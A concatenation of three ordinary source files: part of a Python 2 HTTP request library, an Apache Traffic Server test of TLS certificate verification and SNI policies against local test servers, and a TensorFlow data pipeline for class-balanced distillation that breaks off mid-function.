# (contrary to the HTTP standard), but no harm in testing
# for it
if ('gzip' in headers.get('content-encoding', '') or
'gzip' in headers.get('transfer-encoding', '')):
self._gzipped = True
def json(self):
"""Decode response contents as JSON.
:returns: object decoded from JSON
:rtype: :class:`list` / :class:`dict`
"""
return json.loads(self.content, self.encoding or 'utf-8')
@property
def encoding(self):
"""Text encoding of document or ``None``
:returns: :class:`str` or ``None``
"""
if not self._encoding:
self._encoding = self._get_encoding()
return self._encoding
@property
def content(self):
"""Raw content of response (i.e. bytes)
:returns: Body of HTTP response
:rtype: :class:`str`
"""
if not self._content:
# Decompress gzipped content
if self._gzipped:
decoder = zlib.decompressobj(16 + zlib.MAX_WBITS)
self._content = decoder.decompress(self.raw.read())
else:
self._content = self.raw.read()
return self._content
@property
def text(self):
"""Unicode-decoded content of response body.
If no encoding can be determined from HTTP headers or the content
itself, the encoded response body will be returned instead.
:returns: Body of HTTP response
:rtype: :class:`unicode` or :class:`str`
"""
if self.encoding:
return unicodedata.normalize('NFC', unicode(self.content,
self.encoding))
return self.content
def iter_content(self, chunk_size=4096, decode_unicode=False):
"""Iterate over response data.
.. versionadded:: 1.6
:param chunk_size: Number of bytes to read into memory
:type chunk_size: ``int``
:param decode_unicode: Decode to Unicode using detected encoding
:type decode_unicode: ``Boolean``
:returns: iterator
"""
def decode_stream(iterator, r):
decoder = codecs.getincrementaldecoder(r.encoding)(errors='replace')
for chunk in iterator:
data = decoder.decode(chunk)
if data:
yield data
data = decoder.decode(b'', final=True)
if data:
yield data # pragma: nocover
def generate():
if self._gzipped:
decoder = zlib.decompressobj(16 + zlib.MAX_WBITS)
while True:
chunk = self.raw.read(chunk_size)
if not chunk:
break
if self._gzipped:
chunk = decoder.decompress(chunk)
yield chunk
chunks = generate()
if decode_unicode and self.encoding:
chunks = decode_stream(chunks, self)
return chunks
def save_to_path(self, filepath):
"""Save retrieved data to file at ``filepath``
.. versionadded: 1.9.6
:param filepath: Path to save retrieved data.
"""
filepath = os.path.abspath(filepath)
dirname = os.path.dirname(filepath)
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(filepath, 'wb') as fileobj:
for data in self.iter_content():
fileobj.write(data)
def raise_for_status(self):
"""Raise stored error if one occurred.
error will be instance of :class:`urllib2.HTTPError`
"""
if self.error is not None:
raise self.error
return
def _get_encoding(self):
"""Get encoding from HTTP headers or content.
:returns: encoding or `None`
:rtype: ``unicode`` or ``None``
"""
headers = self.raw.info()
encoding = None
if headers.getparam('charset'):
encoding = headers.getparam('charset')
# HTTP Content-Type header
for param in headers.getplist():
if param.startswith('charset='):
encoding = param[8:]
break
# Encoding declared in document should override HTTP headers
if self.mimetype == 'text/html': # sniff HTML headers
m = re.search("""<meta.+charset=["']{0,1}(.+?)["'].*>""",
self.content)
if m:
encoding = m.group(1)
elif ((self.mimetype.startswith('application/') or
self.mimetype.startswith('text/')) and
'xml' in self.mimetype):
m = re.search("""<?xml.+encoding=["'](.+?)["'][^>]*\?>""",
self.content)
if m:
encoding = m.group(1)
# Format defaults
if self.mimetype == 'application/json' and not encoding:
# The default encoding for JSON
encoding = 'utf-8'
elif self.mimetype == 'application/xml' and not encoding:
# The default for 'application/xml'
encoding = 'utf-8'
if encoding:
encoding = encoding.lower()
return encoding
def request(method, url, params=None, data=None, headers=None, cookies=None,
files=None, auth=None, timeout=60, allow_redirects=False):
"""Initiate an HTTP(S) request. Returns :class:`Response` object.
:param method: 'GET' or 'POST'
:type method: ``unicode``
:param url: URL to open
:type url: ``unicode``
:param params: mapping of URL parameters
:type params: :class:`dict`
:param data: mapping of form data ``{'field_name': 'value'}`` or
:class:`str`
:type data: :class:`dict` or :class:`str`
:param headers: HTTP headers
:type headers: :class:`dict`
:param cookies: cookies to send to server
:type cookies: :class:`dict`
:param files: files to upload (see below).
:type files: :class:`dict`
:param auth: username, password
:type auth: ``tuple``
:param timeout: connection timeout limit in seconds
:type timeout: ``int``
:param allow_redirects: follow redirections
:type allow_redirects: ``Boolean``
:returns: :class:`Response` object
The ``files`` argument is a dictionary::
{'fieldname' : { 'filename': 'blah.txt',
'content': '<binary data>',
'mimetype': 'text/plain'}
}
* ``fieldname`` is the name of the field in the HTML form.
* ``mimetype`` is optional. If not provided, :mod:`mimetypes` will
be used to guess the mimetype, or ``application/octet-stream``
will be used.
"""
# TODO: cookies
# TODO: any way to force GET or POST?
socket.setdefaulttimeout(timeout)
# Default handlers
openers = []
if not allow_redirects:
openers.append(NoRedirectHandler())
if auth is not None: # Add authorisation handler
username, password = auth
password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_manager.add_password(None, url, username, password)
auth_manager = urllib2.HTTPBasicAuthHandler(password_manager)
openers.append(auth_manager)
# Install our custom chain of openers
opener = urllib2.build_opener(*openers)
urllib2.install_opener(opener)
if not headers:
headers = CaseInsensitiveDictionary()
else:
headers = CaseInsensitiveDictionary(headers)
if 'user-agent' not in headers:
headers['user-agent'] = USER_AGENT
# Accept gzip-encoded content
encodings = [s.strip() for s in
headers.get('accept-encoding', '').split(',')]
if 'gzip' not in encodings:
encodings.append('gzip')
headers['accept-encoding'] = ', '.join(encodings)
if files:
if not data:
data = {}
new_headers, data = encode_multipart_formdata(data, files)
headers.update(new_headers)
elif data and isinstance(data, dict):
data = urllib.urlencode(str_dict(data))
# Make sure everything is encoded text
headers = str_dict(headers)
if isinstance(url, unicode):
url = url.encode('utf-8')
if params: # GET args (POST args are handled in encode_multipart_formdata)
scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
if query: # Combine query string and `params`
url_params = urlparse.parse_qs(query)
# `params` take precedence over URL query string
url_params.update(params)
params = url_params
query = urllib.urlencode(str_dict(params), doseq=True)
url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))
req = urllib2.Request(url, data, headers)
return Response(req)
def get(url, params=None, headers=None, cookies=None, auth=None,
timeout=60, allow_redirects=True):
"""Initiate a GET request. Arguments as for :func:`request`.
:returns: :class:`Response` instance
"""
return request('GET', url, params, headers=headers, cookies=cookies,
auth=auth, timeout=timeout, allow_redirects=allow_redirects)
def post(url, params=None, data=None, headers=None, cookies=None, files=None,
auth=None, timeout=60, allow_redirects=False):
"""Initiate a POST request. Arguments as for :func:`request`.
:returns: :class:`Response` instance
"""
return request('POST', url, params, data, headers, cookies, files, auth,
timeout, allow_redirects)
def encode_multipart_formdata(fields, files):
"""Encode form data (``fields``) and ``files`` for POST request.
:param fields: mapping of ``{name : value}`` pairs for normal form fields.
:type fields: :class:`dict`
:param files: dictionary of fieldnames/files elements for file data.
See below for details.
:type files: :class:`dict` of :class:`dicts`
:returns: ``(headers, body)`` ``headers`` is a :class:`dict` of HTTP headers
:rtype: 2-tuple ``(dict, str)``
The ``files`` argument is a dictionary::
{'fieldname' : { 'filename': 'blah.txt',
'content': '<binary data>',
'mimetype': 'text/plain'}
}
- ``fieldname`` is the name of the field in the HTML form.
- ``mimetype`` is optional. If not provided, :mod:`mimetypes` will be used to guess the mimetype, or ``application/octet-stream`` will be used.
"""
def get_content_type(filename):
"""Return or guess mimetype of ``filename``.
:param filename: filename of file
:type filename: unicode/string
:returns: mime-type, e.g. ``text/html``
:rtype: :class::class:`str`
"""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
boundary = '-----' + ''.join(random.choice(BOUNDARY_CHARS)
for i in range(30))
CRLF = '\r\n'
output = []
# Normal form fields
for (name, value) in fields.items():
if isinstance(name, unicode):
name = name.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
output.append('--' + boundary)
output.append('Content-Disposition: form-data; name="%s"' % name)
output.append('')
output.append(value)
# Files to upload
for name, d in files.items():
filename = d[u'filename']
content = d[u'content']
if u'mimetype' in d:
mimetype = d[u'mimetype']
else:
mimetype = get_content_type(filename)
if isinstance(name, unicode):
name = name.encode('utf-8')
if isinstance(filename, unicode):
filename = filename.encode('utf-8')
if isinstance(mimetype, unicode):
mimetype = mimetype.encode('utf-8')
output.append('--' + boundary)
output.append('Content-Disposition: form-data; '
'name="%s"; filename="%s"' % (name, filename))
output.append('Content-Type: %s' % mimetype)
output.append('')
output.append(content)
output.append('--' + boundary + '--')
output.append('')
body = CRLF.join(output)
headers = {
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
'Content-Length': str(len(body)),
}
return (headers, body)
|
|
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
Test.Summary = '''
Test tls server certificate verification options. Exercise conf_remap
'''
# Define default ATS
ts = Test.MakeATSProcess("ts", select_ports=True, enable_tls=True)
server_foo = Test.MakeOriginServer("server_foo",
ssl=True,
options={"--key": "{0}/signed-foo.key".format(Test.RunDirectory),
"--cert": "{0}/signed-foo.pem".format(Test.RunDirectory)})
server_bar = Test.MakeOriginServer("server_bar",
ssl=True,
options={"--key": "{0}/signed-bar.key".format(Test.RunDirectory),
"--cert": "{0}/signed-bar.pem".format(Test.RunDirectory)})
server = Test.MakeOriginServer("server", ssl=True)
dns = Test.MakeDNServer("dns")
request_foo_header = {"headers": "GET / HTTP/1.1\r\nHost: foo.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
request_bad_foo_header = {"headers": "GET / HTTP/1.1\r\nHost: bad_foo.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
request_bar_header = {"headers": "GET / HTTP/1.1\r\nHost: bar.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
request_bad_bar_header = {"headers": "GET / HTTP/1.1\r\nHost: bad_bar.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_header = {"headers": "HTTP/1.1 200 OK\r\nConnection: close\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
server_foo.addResponse("sessionlog.json", request_foo_header, response_header)
server_foo.addResponse("sessionlog.json", request_bad_foo_header, response_header)
server_bar.addResponse("sessionlog.json", request_bar_header, response_header)
server_bar.addResponse("sessionlog.json", request_bad_bar_header, response_header)
# add ssl materials like key, certificates for the server
ts.addSSLfile("ssl/signed-foo.pem")
ts.addSSLfile("ssl/signed-foo.key")
ts.addSSLfile("ssl/signed-bar.pem")
ts.addSSLfile("ssl/signed-bar.key")
ts.addSSLfile("ssl/server.pem")
ts.addSSLfile("ssl/server.key")
ts.addSSLfile("ssl/signer.pem")
ts.addSSLfile("ssl/signer.key")
ts.Disk.remap_config.AddLine(
'map http://foo.com/basic https://foo.com:{0}'.format(server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://foo.com/override https://foo.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED'.format(
server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://bar.com/basic https://bar.com:{0}'.format(server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://bar.com/overridedisabled https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=DISABLED'.format(
server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://bar.com/overridesignature https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=SIGNATURE @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED'.format(
server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://bar.com/overrideenforced https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED'.format(
server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /basic https://127.0.0.1:{0}'.format(server.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /overrideenforce https://127.0.0.1:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED'.format(
server.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /overridename https://127.0.0.1:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME'.format(
server.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicyfooremap https://foo.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=remap'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicyfoohost https://foo.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=host'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicyfooservername https://foo.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=server_name'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicybarremap https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=remap'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicybarhost https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=host'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicybarservername https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=server_name'.format(
server_bar.Variables.SSL_Port))
ts.Disk.ssl_multicert_config.AddLine(
'dest_ip=* ssl_cert_name=server.pem ssl_key_name=server.key'
)
# Case 1, global config policy=permissive properties=signature
# override for foo.com policy=enforced properties=all
ts.Disk.records_config.update({
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'ssl',
'proxy.config.ssl.server.cert.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.server.private_key.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.client.CA.cert.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.client.CA.cert.filename': 'signer.pem',
'proxy.config.url_remap.pristine_host_hdr': 1,
'proxy.config.exec_thread.autoconfig.scale': 1.0,
'proxy.config.dns.nameservers': '127.0.0.1:{0}'.format(dns.Variables.Port),
'proxy.config.dns.resolv_conf': 'NULL',
'proxy.config.ssl.client.verify.server.policy': 'PERMISSIVE'
})
dns.addRecords(records={"foo.com.": ["127.0.0.1"]})
dns.addRecords(records={"bar.com.": ["127.0.0.1"]})
# Should succeed without message
tr = Test.AddTestRun("default-permissive-success")
tr.Setup.Copy("ssl/signed-foo.key")
tr.Setup.Copy("ssl/signed-foo.pem")
tr.Setup.Copy("ssl/signed-bar.key")
tr.Setup.Copy("ssl/signed-bar.pem")
tr.Processes.Default.Command = 'curl -k -H \"host: foo.com\" http://127.0.0.1:{0}/basic'.format(ts.Variables.port)
tr.ReturnCode = 0
tr.Processes.Default.StartBefore(dns)
tr.Processes.Default.StartBefore(server_foo)
tr.Processes.Default.StartBefore(server_bar)
tr.Processes.Default.StartBefore(server)
tr.Processes.Default.StartBefore(Test.Processes.ts)
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
# Should succeed. No message
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr2 = Test.AddTestRun("default-permissive-fail")
tr2.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/basic".format(ts.Variables.port)
tr2.ReturnCode = 0
tr2.StillRunningAfter = server
tr2.StillRunningAfter = ts
# Should succeed, but will be message in log about name mismatch
tr2.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr2 = Test.AddTestRun("default-permissive-fail2")
tr2.Processes.Default.Command = "curl -k -H \"host: random.com\" http://127.0.0.1:{0}/basic".format(ts.Variables.port)
tr2.ReturnCode = 0
tr2.StillRunningAfter = server
tr2.StillRunningAfter = ts
# Should succeed, but will be message in log about signature
tr2.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr3 = Test.AddTestRun("override-foo")
tr3.Processes.Default.Command = "curl -k -H \"host: foo.com\" http://127.0.0.1:{0}/override".format(ts.Variables.port)
tr3.ReturnCode = 0
tr3.StillRunningAfter = server
tr3.StillRunningAfter = ts
# Should succeed. No error messages
tr3.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr4 = Test.AddTestRun("override-bar-disabled")
tr4.Processes.Default.Command = "curl -k -H \"host: bad_bar.com\" http://127.0.0.1:{0}/overridedisabled".format(ts.Variables.port)
tr4.ReturnCode = 0
tr4.StillRunningAfter = server
tr4.StillRunningAfter = ts
# Succeed. No error messages
tr4.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr5 = Test.AddTestRun("override-bar-signature-enforced")
tr5.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/overridesignature".format(ts.Variables.port)
tr5.ReturnCode = 0
tr5.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr5.StillRunningAfter = server
tr5.StillRunningAfter = ts
tr6 = Test.AddTestRun("override-bar-enforced")
tr6.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/overrideenforced".format(ts.Variables.port)
tr6.ReturnCode = 0
# Should fail
tr6.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could Not Connect", "Curl attempt should have failed")
tr6.StillRunningAfter = server
tr6.StillRunningAfter = ts
# Should succeed
tr = Test.AddTestRun("foo-to-bar-sni-policy-remap")
tr.Processes.Default.Command = "curl -k -H \"host: foo.com\" http://127.0.0.1:{0}/snipolicybarremap".format(ts.Variables.port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could not connect", "Curl attempt should succeed")
# Should fail
tr = Test.AddTestRun("foo-to-bar-sni-policy-host")
tr.Processes.Default.Command = "curl -k -H \"host: foo.com\" http://127.0.0.1:{0}/snipolicybarhost".format(ts.Variables.port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could not connect", "Curl attempt should fail")
# Should fail
tr = Test.AddTestRun("foo-to-bar-sni-policy-servername")
tr.Processes.Default.Command = "curl -k --resolv foo.com:{0}:127.0.0.1 https://foo.com:{0}/snipolicybarservername".format(
ts.Variables.ssl_port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could not connect", "Curl attempt should fail")
# Should fail
tr = Test.AddTestRun("bar-to-foo-sni-policy-remap")
tr.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/snipolicyfooremap".format(ts.Variables.port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could not connect", "Curl attempt should fail")
# Should succeed
tr = Test.AddTestRun("bar-to-foo-sni-policy-host")
tr.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/snipolicyfoohost".format(ts.Variables.port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could not connect", "Curl attempt should succeed")
# Should succeed
tr = Test.AddTestRun("bar-to-foo-sni-policy-servername")
tr.Processes.Default.Command = "curl -k --resolv bar.com:{0}:127.0.0.1 https://bar.com:{0}/snipolicyfooservername".format(
ts.Variables.ssl_port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could not connect", "Curl attempt should succeed")
# Over riding the built in ERROR check since we expect some cases to fail
# checks on random.com should fail with message only
ts.Disk.diags_log.Content = Testers.ContainsExpression(
r"WARNING: Core server certificate verification failed for \(random.com\). Action=Continue Error=self signed certificate server=127.0.0.1\(127.0.0.1\) depth=0",
"Warning for self signed certificate")
# permissive failure for bar.com
ts.Disk.diags_log.Content += Testers.ContainsExpression(
r"WARNING: SNI \(bar.com\) not in certificate. Action=Continue server=bar.com\(127.0.0.1\)",
"Warning on missing name for bar.com")
# name check failure for random.com
ts.Disk.diags_log.Content += Testers.ContainsExpression(
r"WARNING: SNI \(random.com\) not in certificate. Action=Continue server=127.0.0.1\(127.0.0.1\)",
"Warning on missing name for random.com")
# name check failure for bar.com
ts.Disk.diags_log.Content += Testers.ContainsExpression(
r"WARNING: SNI \(bar.com\) not in certificate. Action=Terminate server=bar.com\(127.0.0.1\)",
"Failure on missing name for bar.com")
|
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Input pipeline.
Read and process each example
"""
import functools
from typing import Dict
from class_balanced_distillation import deterministic_data
import ml_collections
import numpy as np
import simclr.tf2.data_util as simclr_data
import tensorflow as tf
import tensorflow_datasets as tfds
def random_color_jitter(image, p=1.0):
def _transform(image):
color_jitter_t = functools.partial(
simclr_data.color_jitter, strength=1.0, impl="simclrv2")
image = simclr_data.random_apply(color_jitter_t, p=0.8, x=image)
return simclr_data.random_apply(simclr_data.to_grayscale, p=0.2, x=image)
return simclr_data.random_apply(_transform, p=p, x=image)
def oversample_classes(example, base_probs, target_probs):
"""Returns the number of copies of given example."""
cur_label = example["label"]
cur_prob = base_probs[cur_label]
cur_target_prob = target_probs[cur_label]
# Add tiny to initial_probs to avoid divide by zero.
denom = (cur_prob + np.finfo(cur_prob.dtype.as_numpy_dtype).tiny)
ratio_l = tf.cast(cur_target_prob / denom, tf.float32)
# Return 1 for head classes, we only want to sample them once
max_ratio = tf.maximum(ratio_l, 1)
# This is the number of duplicates we want to add for oversampling
num_oversamples = tf.floor(ratio_l)
# Maybe add one more based on the residual probability
residual = max_ratio - num_oversamples
residual_sel = tf.less_equal(
tf.random.uniform([], dtype=tf.float32), residual
)
return tf.cast(num_oversamples, tf.int64) + tf.cast(residual_sel, tf.int64)
def undersampling_filter(example, base_probs, target_probs):
"""Computes if given example is rejected or not."""
cur_label = example["label"]
cur_prob = base_probs[cur_label]
cur_target_prob = target_probs[cur_label]
# Add tiny to initial_probs to avoid divide by zero.
denom = (cur_prob + np.finfo(cur_prob.dtype.as_numpy_dtype).tiny)
ratio_l = tf.cast(cur_target_prob / denom, tf.float32)
acceptance_prob = tf.minimum(ratio_l, 1.0)
acceptance = tf.less_equal(tf.random.uniform([], dtype=tf.float32),
acceptance_prob)
return acceptance
def resize_small(image,
size,
*,
antialias = False):
"""Resizes the smaller side to `size` keeping aspect ratio.
Args:
image: Single image as a float32 tensor.
size: an integer, that represents a new size of the smaller side of an input
image.
antialias: Whether to use an anti-aliasing filter when downsampling an
image.
Returns:
A function, that resizes an image and preserves its aspect ratio.
"""
h, w = tf.shape(image)[0], tf.shape(image)[1]
# Figure out the necessary h/w.
ratio = (tf.cast(size, tf.float32) / tf.cast(tf.minimum(h, w), tf.float32))
h = tf.cast(tf.round(tf.cast(h, tf.float32) * ratio), tf.int32)
w = tf.cast(tf.round(tf.cast(w, tf.float32) * ratio), tf.int32)
image = tf.image.resize(image, [h, w], antialias=antialias)
return image
def central_crop(image, size):
"""Makes central crop of a given size."""
h, w = size, size
top = (tf.shape(image)[0] - h) // 2
left = (tf.shape(image)[1] - w) // 2
image = tf.image.crop_to_bounding_box(image, top, left, h, w)
return image
def decode_and_random_resized_crop(image, rng,
resize_size,
do_normalize = True):
"""Decodes the images and extracts a random crop."""
shape = tf.io.extract_jpeg_shape(image)
begin, size, _ = tf.image.stateless_sample_distorted_bounding_box(
shape,
tf.zeros([0, 0, 4], tf.float32),
seed=rng,
area_range=(0.05, 1.0),
min_object_covered=0, # Don't enforce a minimum area.
use_image_if_no_bounding_boxes=True)
top, left, _ = tf.unstack(begin)
h, w, _ = tf.unstack(size)
image = tf.image.decode_and_crop_jpeg(image, [top, left, h, w], channels=3)
if do_normalize:
image = tf.cast(image, tf.float32) / 255.0
image = tf.image.resize(image, (resize_size, resize_size))
return image
def train_preprocess(features,
add_jitter = False):
"""Processes a single example for training."""
image = features["image"]
label = features["label"]
# This PRNGKey is unique to this example. We can use it with the stateless
# random ops in TF.
rng = features.pop("rng")
rng, rng_crop, rng_flip = tf.unstack(
tf.random.experimental.stateless_split(rng, 3))
image = decode_and_random_resized_crop(image, rng_crop, resize_size=224)
image = tf.image.stateless_random_flip_left_right(image, rng_flip)
if add_jitter:
image = random_color_jitter(image)
image = tf.clip_by_value(image, 0., 1.)
features = {"image": image, "label": label}
return features
def eval_preprocess(features):
"""Process a single example for evaluation."""
image = features["image"]
assert image.dtype == tf.uint8
image = tf.cast(image, tf.float32) / 255.0
image = resize_small(image, size=256)
image = central_crop(image, size=224)
return {"image": image, "label": features["label"]}
def create_datasets(
config, data_rng, *,
strategy):
"""Create datasets for training and evaluation.
For the same data_rng and config this will return the same datasets. The
datasets only contain stateless operations.
Args:
config: Configuration to use.
data_rng: PRNGKey for seeding operations in the training dataset.
strategy: Distribution strategy to use. Each replica will run a separate
input pipeline.
Returns:
A tuple with the dataset info, the training dataset and the evaluation
dataset.
"""
if config.dataset == "imagenet-lt":
dataset_builder = (
tfds.builder("imagenet_lt",
data_dir="~/data/imagenet-lt/tfds/"))
elif config.dataset == "inaturalist18":
dataset_builder = (
tfds.builder("i_naturalist2018",
data_dir="~/data/inaturalist18/tfds/"))
else:
raise ValueError(f"Dataset {config.dataset} not supported.")
def train_split(host_id, host_count):
return deterministic_data.get_read_instruction_for_host(
"train",
dataset_builder.info.splits["train"].num_examples,
host_id=host_id,
host_count=host_count)
def val_split(host_id, host_count):
return deterministic_data.get_read_instruction_for_host(
"validation",
dataset_builder.info.splits["validation"].num_examples,
host_id=host_id,
host_count=host_count,
drop_remainder=False
)
def test_split(host_id, host_count):
return deterministic_data.get_read_instruction_for_host(
"test",
dataset_builder.info.splits["test"].num_examples,
host_id=host_id,
host_count=host_count,
drop_remainder=False
)
if config.sampling == "class_balanced" or config.sampling == "sqrt":
if config.dataset == "imagenet-lt":
img_per_class = np.load(
tf.io.gfile.GFile(
"class_balanced_distillation/data/ImageNet_LT/train_img_per_class.npy",
"rb"))
elif config.dataset == "inaturalist18":
img_per_class = np.load(
tf.io.gfile.GFile(
"class_balanced_distillation/data/iNaturalist18/train_img_per_class.npy",
"rb"))
else:
raise ValueError(f"Dataset {config.dataset} not supported.")
base_probs = img_per_class / img_per_class.sum()
target_probs = np.ones_like(img_per_class, dtype=np.float32)
target_probs = target_probs / target_probs.sum()
base_probs = tf.convert_to_tensor(
base_probs, dtype=tf.float32)
target_probs = tf.convert_to_tensor(
target_probs.astype(np.float32), dtype=tf.float32)
oversampling_fn = functools.partial(
oversample_classes,
base_probs=base_probs,
target_probs=target_probs,
)
undersampling_filter_fn = functools.partial(
undersampling_filter,
base_probs=base_probs,
target_probs=target_probs,
)
elif config.sampling == "uniform":
undersampling_filter_fn = None
oversampling_fn = None
else:
raise ValueError(f"Sampling {config.sampling} not supported.")
train_preprocess_fn = functools.partial(
train_preprocess, add_jitter=config.add_color_jitter)
train_ds = deterministic_data.create_distributed_dataset(
dataset_builder,
strategy=strategy,
global_batch_size=config.global_batch_size,
split=train_split,
num_epochs=config.num_epochs,
shuffle=True,
cache=False,
filter_fn=undersampling_filter_fn,
preprocess_fn=train_preprocess_fn,
decoders={"image": tfds.decode.SkipDecoding()},
shuffle_buffer_size=config.shuffle_buffer_size,
prefetch_size=8,
rng=data_rng,
oversampling_fn=oversampling_fn)
eval_preprocess_fn = functools.partial(
eval_preprocess)
if config.dataset != "inaturalist18":
test_num_batches = int(
np.ceil(dataset_builder.info.splits["test"].num_examples /
(config.global_batch_size))) * strategy.num_replicas_in_sync
test_ds = deterministic_data.create_distributed_dataset(
dataset_builder,
strategy=strategy,
global_batch_size=config.global_batch_size,
split=test_split,
num_epochs=1,
shuffle=False,
cache=True,
preprocess_fn=eval_preprocess_fn,
